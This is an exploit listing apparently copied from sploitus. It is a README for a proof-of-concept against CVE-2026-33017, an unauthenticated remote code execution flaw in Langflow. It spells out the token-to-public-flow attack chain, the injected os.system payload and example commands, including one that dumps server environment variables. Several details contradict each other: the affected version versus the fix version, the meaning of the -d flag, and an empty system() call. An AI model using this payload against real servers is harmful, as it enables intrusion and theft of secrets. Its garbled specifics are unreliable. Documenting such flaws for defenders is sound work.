Share
## https://sploitus.com/exploit?id=15EA35A2-9BDA-5C30-9DAB-63764BD13F31
# CVE-2026-33017 โ€” Langflow Unauthenticated Remote Code Execution (RCE)
 
## Overview
 
**CVE ID:** CVE-2026-33017  
**Affected Software:** Langflow
**Vulnerable Versions:** = 1.9.0
**Severity:** Critical  
**Author:** r3nsi15  
**Date:** 2026  
 
## Description
 
Langflow exposes a public flow build endpoint (`/api/v1/build_public_tmp/{flowID}/flow`) that accepts
arbitrary `CustomComponent` code blocks and executes them server-side without authentication. By
injecting a malicious Python payload into the `code` field of a `CustomComponent` node, an unauthenticated
attacker can run arbitrary operating system commands with the privileges of the Langflow server process.
 
The attack chain first abuses the `/api/v1/auto_login` endpoint, which issues a bearer token without
requiring credentials when Langflow is running in its default auto-login configuration. Then it uses
that token to create a temporary public flow and trigger server-side code execution through the build
endpoint.
 
## Affected Endpoints
 
| Endpoint | Method | Auth Required | Purpose |
|---|---|---|---|
| `/api/v1/auto_login` | GET | No | Obtain bearer token (auto-login must be enabled) |
| `/api/v1/flows/` | POST | Yes (Bearer) | Create a new flow |
| `/api/v1/build_public_tmp/{flowID}/flow` | POST | No (public) | Trigger build โ€” **vulnerable execution point** |
| `/api/v1/flows/{flowID}` | DELETE | Yes (Bearer) | Clean up the created flow |
 
## Proof of Concept
 
**File:** `CVE-2026-33017_POC.py`
 
### Requirements
 
- Python 3.x  
- `requests` library  
- Network access to a Langflow instance running with auto-login enabled
```bash
pip install requests
```
 
### Usage
 
```bash
python3 CVE-2026-33017_POC.py -u  -c  [-d]
```
 
### Arguments
 
| Flag | Long Form | Required | Description |
|---|---|---|---|
| `-u` | `--url` | Yes | Base URL of the Langflow instance |
| `-c` | `--command` | Yes | OS command to execute on the server |
| `-d` | `--delete` | No | Delete the created flow after exploitation |
 
### Examples
 
**Verify code execution:**
```bash
python3 CVE-2026-33017_POC.py -u http://langflow.example.com -c "id"
```
 
**Retrieve server environment variables:**
```bash
python3 CVE-2026-33017_POC.py -u http://langflow.example.com -c "env"
```
 
**Keep the flow alive after exploitation (skip cleanup):**
```bash
python3 CVE-2026-33017_POC.py -u http://langflow.example.com -c "whoami" -d
```
 
### Expected Output
 
```
[+] Got token
[+] Created flow with id: 
[+] Exploit sent successfully!
[+] Flow deleted successfully!
```
 
## Payload Breakdown
 
The exploit injects the following Python snippet into the `code` field of a `CustomComponent` node:
 
```python
from langflow.custom import Component
from langflow.io import Output
_r = __import__('os').system()
class ExploitComponent(Component):
    display_name = "ExploitComponent"
    outputs = [Output(display_name="Result", name="output", method="run")]
    def run(self):
        return "ok"
```
 
- `__import__('os').system(...)` - dynamically imports the `os` module and executes the attacker-supplied shell command on the server.
- The rest of the class definition is a valid `CustomComponent` required to satisfy Langflow's component loader without raising a parse error.
- The flow is created as `PUBLIC` and the build endpoint is invoked on its public endpoint, meaning **no session cookie or authentication token is required** to trigger execution.
## Root Cause
 
Langflow's `CustomComponent` system allows arbitrary Python code to be submitted as part of a flow
definition. The `/api/v1/build_public_tmp/{flowID}/flow` endpoint builds and partially evaluates this
code server-side including module-level statements without sandboxing or restricting access to
Python built-ins such as `__import__`.
 
## Attack Chain Summary
 
```
1. GET /api/v1/auto_login          โ†’  Obtain Bearer token (no credentials needed)
2. POST /api/v1/flows/             โ†’  Create a PUBLIC flow (Bearer token)
3. POST /api/v1/build_public_tmp/  โ†’  Inject & execute malicious CustomComponent (no auth)
4. DELETE /api/v1/flows/{id}       โ†’  Clean up (optional)
```
 
All four steps can be performed by an anonymous attacker against a default Langflow deployment.
 
## Remediation
 
- **Upgrade** Langflow to version 1.9.0 or above.
- **Disable auto-login** (`LANGFLOW_AUTO_LOGIN=false`) in any internet-facing deployment.

## Disclaimer
 
This proof of concept is provided for **educational and authorized security research purposes only**.
Use of this script against systems without explicit written permission is illegal and unethical.
The author and contributors assume no liability for misuse.